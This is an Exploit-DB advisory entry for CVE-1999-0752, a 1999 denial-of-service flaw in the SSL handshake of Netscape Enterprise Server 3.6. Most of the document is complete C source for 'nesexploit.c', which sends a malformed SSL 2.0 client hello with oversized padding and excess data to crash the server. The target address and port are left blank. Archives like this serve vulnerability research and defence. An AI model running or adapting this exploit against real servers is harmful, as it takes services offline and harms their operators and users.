Netscape Enterprise Server <= 3.6 SSL Buffer Overflow DoS Vulnerability

1999-07-06T00:00:00
ID EDB-ID:19416
Type exploitdb
Reporter Arne Vidstrom
Modified 1999-07-06T00:00:00

Description

Netscape Enterprise Server 3.6 SSL Buffer Overflow DoS Vulnerability. CVE-1999-0752. Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/516/info

Netscape's Enterprise Server suffers from a buffer overflow error in the SSL handshaking code that causes it to crash when the buffer is overrun. 

  //
  // nesexploit.c - v1.02 - by Arne Vidstrom, winnt@bahnhof.se
  //
  // This program crashes Netscape Enterprise Server when it is
  // running in SSL mode, by exploiting a bug in the SSL handshake
  // code. The server crashes if the client:
  //
  //  * starts with SSL 2.0 format
  //  * uses long record header
  //  * uses padding >= 8
  //  * sends at least 11 bytes more data than it specifies in the
  //    header
  //  * sends at least about 4 kb data
  //
  // I haven't included any error handling in the code because it's
  // so boring to write... ;o)
  //

  #include <winsock.h>
  #include <string.h>
  #include <stdio.h>

  #define sockaddr_in struct sockaddr_in
  #define sockaddr struct sockaddr

  // Some combinations of these three constants will crash the server,
  // others will not.

  #define PADDING 8
  #define SPECIFIED_SIZE 11822
  #define ACTUAL_SIZE 11833

  void main(void)
  {
          // IP address of the server - set to your own server and nobody
          // elses :o)
          char ipaddr[25] = "xxx.xxx.xxx.xxx";

          // SSL port
          unsigned short port = xxxxx;

          SOCKET socket1;
          unsigned char s[65536];
          int errorCode;
          WSADATA winSockData;
          sockaddr_in peer;
          int result;
          unsigned char i;
          unsigned int l;
          int flags;

          printf("\nnesexploit.c - developed by Arne Vidstrom,
  winnt@bahnhof.se\n\n");

          // Allocate a socket, connect and stuff...
          errorCode = WSAStartup(0x0101, &winSockData);
          socket1 = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
          peer.sin_family = AF_INET;
          peer.sin_port = htons(port);
          peer.sin_addr.s_addr = inet_addr(ipaddr);
          for (i = 0; i < 8; i++)
                  peer.sin_zero[i] = 0;
          result = connect(socket1, (sockaddr *) &peer, sizeof(peer));
          if (result != 0)
                  printf("Ehmn, where's that server? ;o)\n\n");

          // Initialize the buffer with a lot of '.' Anything would do...
          for (l=0; l<65536; l++)
                  s[l] = '.';

          // Version 2.0 Format Header with padding.
          // Shouldn't be any padding because this part is not encrypted,
          // but without padding the server won't crash. :o)
          s[0] = (SPECIFIED_SIZE & 0xff00) >> 8;
          s[1] = (SPECIFIED_SIZE & 0x00ff);
          s[2] = PADDING;

          // Client says Hello!
          s[3] = 0x01;

          // Client wishes to use Version 3.0 later (there will be no "later"
  though...)
          s[4] = 0x03;
          s[5] = 0x00;

          // Cipher Specs Length = 3
          s[6] = 0x00;
          s[7] = 0x0c;

          // Session ID = 0
          s[8] = 0x00;
          s[9] = 0x00;

          // Challenge Length = 16
          s[10] = 0x00;
          s[11] = 0x10;

          // Challenge Specs Data
          s[12] = 0x02;
          s[13] = 0x00;
          s[14] = 0x80;

          s[15] = 0x04;
          s[16] = 0x00;
          s[17] = 0x80;

          s[18] = 0x00;
          s[19] = 0x00;
          s[20] = 0x03;

          s[21] = 0x00;
          s[22] = 0x00;
          s[23] = 0x06;

          // Challenge Data is a few '.' from above

          // The rest is also '.' from above

          // Send all this to the server
          flags = 0;
          result = send(socket1, s, ACTUAL_SIZE, flags);
          if (result != SOCKET_ERROR)
                  printf("Done!\n\n");

          // Clean up
          closesocket(socket1);
          WSACleanup();
  }